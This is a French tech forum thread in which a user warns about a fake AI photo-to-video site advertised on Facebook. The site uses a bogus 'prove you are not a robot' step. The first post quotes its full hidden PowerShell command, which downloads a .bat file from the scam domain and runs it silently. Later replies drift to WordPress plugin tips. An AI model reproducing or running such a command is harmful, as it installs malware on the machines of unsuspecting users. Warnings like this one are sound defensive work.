L'IA et les malwares/virus

• 8
    Replies
  • 104
    views
  • ramax's Avatar
    L'IA générative, texte, image et vidéo sont hyper à la mode. D'ailleur le mot IA est lui même utilisé absolument partout.

(Petite parenthèse à ce propos : je suis en train de refaire le site de ma BD, sous wordpress ... j'ai 1 plugin sur deux qui me propose de l'IA; c'est assez dingue. Entre la génération de site complet par IA, les chatbot IA, générateur de news IA, creation de spam par IA, dropshiping IA etc etc ...)

Bref, et sur facebook bon nombre de pub sont pour les IA générative.

Mais je suis tombé sur un site qui propose de la génération de vidéo via une photo. Y en a plein qui se lancent la dedans et je trouve ça intéressant de mettre une photo de quelqu'un qu'on a perdu par exemple, des vielle photo en N&B d’après guerre, etc.

Et donc j'essaie : Ai-Kling.com, proposé en pub sur facebook, par curiosité. (N'y allez pas, attendez la suite)

Le site ressemble comme deux goute d'eau à un autre, ça me laisse méfiant. De plus les vidéo en démo, j'ai une forte impression de déjà vu.
    J’essaie de mettre une photo perso pour voir, une page de chargement se lance et ... : lol (enfin pas tant que ça)

Name:  Captured'écran2024-12-11171628.jpg
Views: 43
Size:  73.8 KB

Le site me demande de prouver que je ne suis pas un robot en lançant le raccourcit Windows + R puis une commande mise en mémoire par le site

GEEEENNNNRREEEEEEE

Et voila la fameuse commande :

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'https://ai-kling.online/x.bat' -OutFile $env:TEMP\y.bat; Start-Process $env:TEMP\y.bat -WindowStyle Hidden} #Authentication Is Not a Robot Press Enter To Confirm

Vous imaginez le nombre de gens qui vont le faire ? (D’ailleurs quelqu'un veut tester ici ? 🤣) C'est une pub facebook, donc un large public qui ne sais pas ce qu'est une commande powershell
  • 8 Replies

• Valiguard's Avatar
    Level 52
    Tu n'es pas allé jusqu'au bout ? 😁
  • Klaw's Avatar
    Level 22
    Malin 😅
    Les arnaqueurs ont quand même une sacrée imagination.
  • ramax's Avatar
    @Valiguard non :D étrangement, je ne suis pas tenté :p
    @Klaw j'ai été faire un tour sur Reddit, et apparement y a des gens qui se sont abonné (une précédente arnaque ? ) et ils n'arrivent pas à se désabonné.

Ils ont l'air hyper efficace pour voler les gens !
  • mastereur's Avatar
    Level 52
    Tiens, il faudrait que tu m'indique tes plugins wordpress, ça m'interesse :)
  • ramax's Avatar
    @mastereur tu veux faire quoi ?

J'utilise par exemple :

- Woocommerce pour la boutique
    - Elementor pour construire le site
    - Forminator pour les formulaire (page de contact ... )
    - AJAX Thumbnail Rebuild parce que lors d'un changement d'hebergeur y a la moitié des images qui ne fonctionnent plus
    - Social Auto Poster pour publier un article une seule fois, et ça le publie sur facebook, instagram et tumblr en même temps
    - Vividbackup pour les backup
    - LWS Hide Login - très important - pour changer le nom de la page de login
    - Tout un tas d'outil LWS (c'est mon hébergeur) pour sécuriser wordpress
  • mastereur's Avatar
    Level 52
    @ramax Je dois faire un site web pour des amis qui ont leur entreprise.
    Site très basique mais faut que je me replonge dessus. (ça fait 5 ans que je n'avais pas touché à WP et ça a bien changé depuis !)
  • ramax's Avatar
    @mastereur il faut choisir, si aucun thème gratuit te plait, un bon constructeur.

Elementor
    DIVI
    ...

https://wpmarmite.com/compare/meille...age-wordpress/
  • Badfluffy's Avatar
    Level 13
    😂 à mon avis, la plupart des utilisateurs vont s'arrêter à raccourci Windows + R